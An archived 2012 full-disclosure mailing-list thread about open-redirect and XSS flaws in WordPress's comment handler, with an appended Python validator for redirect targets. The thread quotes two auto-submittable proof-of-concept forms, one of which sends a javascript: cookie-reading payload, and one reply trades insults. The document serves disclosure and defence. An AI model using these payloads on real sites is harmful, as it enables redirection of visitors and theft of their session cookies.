Message-ID: <CAEJizba2LBAEMVfQ0zs3KaZ8o8Y4efvGap7SOHD7cGvzCqGUrw@mail.gmail.com>
Date: Sat, 5 May 2012 15:00:36 +0100
From: Benji <me@...ji.com>
To: InterN0T Advisories <advisories@...ern0t.net>
Cc: full-disclosure@...ts.grok.org.uk, submissions@...ketstormsecurity.org
Subject: Re: IAA, Redirector and XSS vulnerabilities in WordPress

Wow, you're like the Jehovah's Witnesses of the internet. Stop with the childish bitching and grow up. Last time I checked intern0t was also a script kid breeding ground.

On Sat, May 5, 2012 at 2:54 PM, InterN0T Advisories <advisories@...ern0t.net> wrote:
> Hi List,
>
> To stop MustLive's desperate act of trying to get visitors (and more backlinks) to his website, I have, for those who don't want to go there just to see the PoCs but would rather read them on this mailing list like almost _every other_ Proof of Concept / exploit, made them available below.
>
> Contents of Wordpress Redirector:
> <html>
> <head>
> <title>WordPress Redirector exploit (lol?) (C) 2012 MustLive. [removed]</title>
> </head>
> <!-- <body onLoad="document.hack.submit()"> -->
> <body>
> <form name="hack" action="http://site/wp-comments-post.php" method="post">
> <input type="hidden" name="author" value="Test" />
> <input type="hidden" name="email" value="test@...t.test" />
> <input type="hidden" name="comment" value="Test" />
> <input type="hidden" name="comment_post_ID" value="1" />
> <input type="hidden" name="redirect_to" value="http://awebsite.tld" />
> </form>
> </body>
> </html>
> --------------------------------------
>
> Contents of Wordpress XSS:
> <html>
> <head>
> <title>WordPress XSS exploit (lol?) (C) 2012 MustLive. [removed]</title>
> </head>
> <!-- <body onLoad="document.hack.submit()"> -->
> <body>
> <form name="hack" action="http://site/wp-comments-post.php" method="post">
> <input type="hidden" name="author" value="Test" />
> <input type="hidden" name="email" value="test@...t.test" />
> <input type="hidden" name="comment" value="Test21" />
> <input type="hidden" name="comment_post_ID" value="1" />
> <input type="hidden" name="redirect_to" value="javascript:alert%28document.cookie%29//" />
> </form>
> </body>
> </html>
> --------------------------------------
>
> I don't really have any comments about these "exploits".
>
> Best regards,
> Nemesis 3.0
>
> On Sat, 5 May 2012 16:01:53 +0300, "MustLive" <mustlive@...security.com.ua> wrote:
>> Hello list!
>>
>> I want to warn you about security vulnerabilities in WordPress.
>>
>> These are Insufficient Anti-automation, Redirector and Cross-Site Scripting vulnerabilities.
>>
>> -------------------------
>> Affected products:
>> -------------------------
>>
>> Vulnerable are WordPress 2.0 - 3.3.1.
>>
>> ----------
>> Details:
>> ----------
>>
>> Already from WP 2.0 there are Insufficient Anti-automation, Redirector and XSS vulnerabilities in wp-comments-post.php. I faced the IAA just when I began using WP in 2006. While the developers fixed the vulnerabilities in the previous two redirectors in WP 2.3, these vulnerabilities were not fixed even in WP 3.3.1.
>>
>> IAA (WASC-21):
>>
>> Lack of a captcha in the comment form allows automated attacks to be conducted. The developers still haven't put a captcha in the WP comments form (from the first version of the engine), which besides IAA attacks also allowed Redirector and XSS attacks to be conducted.
>>
>> By default in WordPress premoderation is turned on, and there is also a built-in anti-spam filter. But while 10 years ago premoderation would have been enough, this mechanism long ago stopped being sufficient protection against spam, and the anti-spam filter had an efficiency of less than 1% - it marked only a few of the spam messages as spam. And these mechanisms also don't protect against the below-mentioned attacks. The Akismet plugin is also bundled with WP, which is "captcha-less" protection against spam. But by default it's turned off, and compared with captcha it's considered less efficient and also doesn't protect against the below-mentioned attacks.
>>
>> Redirector (URL Redirector Abuse) (WASC-38):
>>
>> Exploit:
>>
>> [Removed]
>>
>> XSS (WASC-08):
>>
>> Exploit:
>>
>> [Removed]
>>
>> The XSS attack is possible on different browsers, but it's harder to conduct than in the case of the previous two redirectors (via data URI). At IIS web servers the redirect goes via the Refresh header, and at other web servers via the Location header.
>>
>> Due to nuances of how this script works (filtering of important symbols and adding of an anchor), tricky bypass methods are needed to execute JS code. This complexity exists both with the javascript URI and with the combo variant javascript URI + data URI.
>>
>> Reliable captcha protects against IAA, Redirector and XSS vulnerabilities.
>>
>> ------------
>> Timeline:
>> ------------
>>
>> 2012.04.26 - disclosed at my site
>>
>> Best wishes & regards,
>> MustLive
>> Administrator of Websecurity web site
>>
>> _______________________________________________
>> Full-Disclosure - We believe in it.
>> Charter: http://lists.grok.org.uk/full-disclosure-charter.html
>> Hosted and sponsored by Secunia - http://secunia.com/
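The thread above shows the same `redirect_to` parameter of `wp-comments-post.php` abused in two ways: as an open redirect to an arbitrary off-site URL, and as XSS via a `javascript:` URI. The defensive counterpart, which no post in the thread spells out, is to validate the parameter against the site's own host before issuing the redirect. The block below is an added example and is not WordPress code nor any poster's code; the function names, the allow-listed host `blog.example.test` and the sample inputs are constructed for the example. It goes a little beyond the two PoC values by also handling percent-encoded, protocol-relative, backslash and credential-in-authority variants of the same problem, which a validator that only string-matches on `javascript:` would miss.

```python
from urllib.parse import urlsplit, urlunsplit, unquote

# Constructed host list for the example; a real site would read this from its
# configuration (for WordPress, the blog's own host name).
ALLOWED_HOSTS = frozenset({"blog.example.test"})
FALLBACK = "/"   # where rejected targets are sent instead


def _normalize(raw: str) -> str:
    """Bring the target into the form a browser would actually interpret.

    * bounded percent-decoding, so ``javascript%3A`` and double-encoded
      variants collapse to plain text before the scheme is inspected;
    * C0 control characters and DEL dropped anywhere (browsers ignore tab
      and newline inside a URL), then surrounding whitespace stripped;
    * backslashes mapped to slashes, as browsers do for http(s) URLs.
    """
    s = raw
    for _ in range(3):                      # bounded: no decode loops
        decoded = unquote(s)
        if decoded == s:
            break
        s = decoded
    s = "".join(ch for ch in s if ord(ch) >= 0x20 and ord(ch) != 0x7F).strip()
    return s.replace("\\", "/")


def validate_redirect(raw: str, allowed_hosts=ALLOWED_HOSTS):
    """Return a safe redirect target, or None when ``raw`` must be rejected.

    Accepted: root-relative paths (``/...`` but not ``//...``) and absolute
    http(s) URLs whose host is exactly one of ``allowed_hosts``.  Rejected:
    every other host, protocol-relative URLs, ``javascript:``, ``data:`` and
    any other scheme, and authorities carrying credentials.  The accepted
    value is returned percent-decoded; re-encode it with the framework's
    URL helper when writing the Location (or Refresh) header.
    """
    target = _normalize(raw)
    if not target or target.startswith("//"):   # '', '//host', '///host'
        return None
    parts = urlsplit(target)
    if parts.scheme == "" and parts.netloc == "":
        # Root-relative path on this site, e.g. '/2012/05/post/#comment-7'.
        return target if target.startswith("/") else None
    if parts.scheme not in ("http", "https"):
        return None                              # javascript:, data:, ...
    if "@" in parts.netloc or parts.hostname not in allowed_hosts:
        return None
    return urlunsplit((parts.scheme, parts.netloc, parts.path or "/",
                       parts.query, parts.fragment))


def is_safe_redirect(raw: str, allowed_hosts=ALLOWED_HOSTS) -> bool:
    """Boolean form of validate_redirect for use in a request handler."""
    return validate_redirect(raw, allowed_hosts) is not None


if __name__ == "__main__":
    # Constructed sample inputs: the two values from the thread's PoC forms
    # plus common encoded/relative variants of the same problem.
    samples = [
        "/2012/05/hello-world/#comment-12",
        "https://blog.example.test/?p=1#comments",
        "http://awebsite.tld",
        "javascript:alert%28document.cookie%29//",
        "//attacker.example/",
        "/\\attacker.example/",
        "data:text/html,x",
        "https://blog.example.test@attacker.example/",
    ]
    for s in samples:
        print(f"{s!r:50} -> {validate_redirect(s) or FALLBACK!r}")
```

The design choice worth noting is exact host matching rather than a prefix or suffix test: `blog.example.test.attacker.example` and `blog.example.test@attacker.example` both contain the trusted name but resolve to the attacker's host, and the normalization step runs before any check so that an encoded or whitespace-padded `javascript:` is seen as a scheme, not as an opaque relative path. A comment-posting handler would call `validate_redirect` on the submitted value and fall back to the post's own URL when it returns `None`.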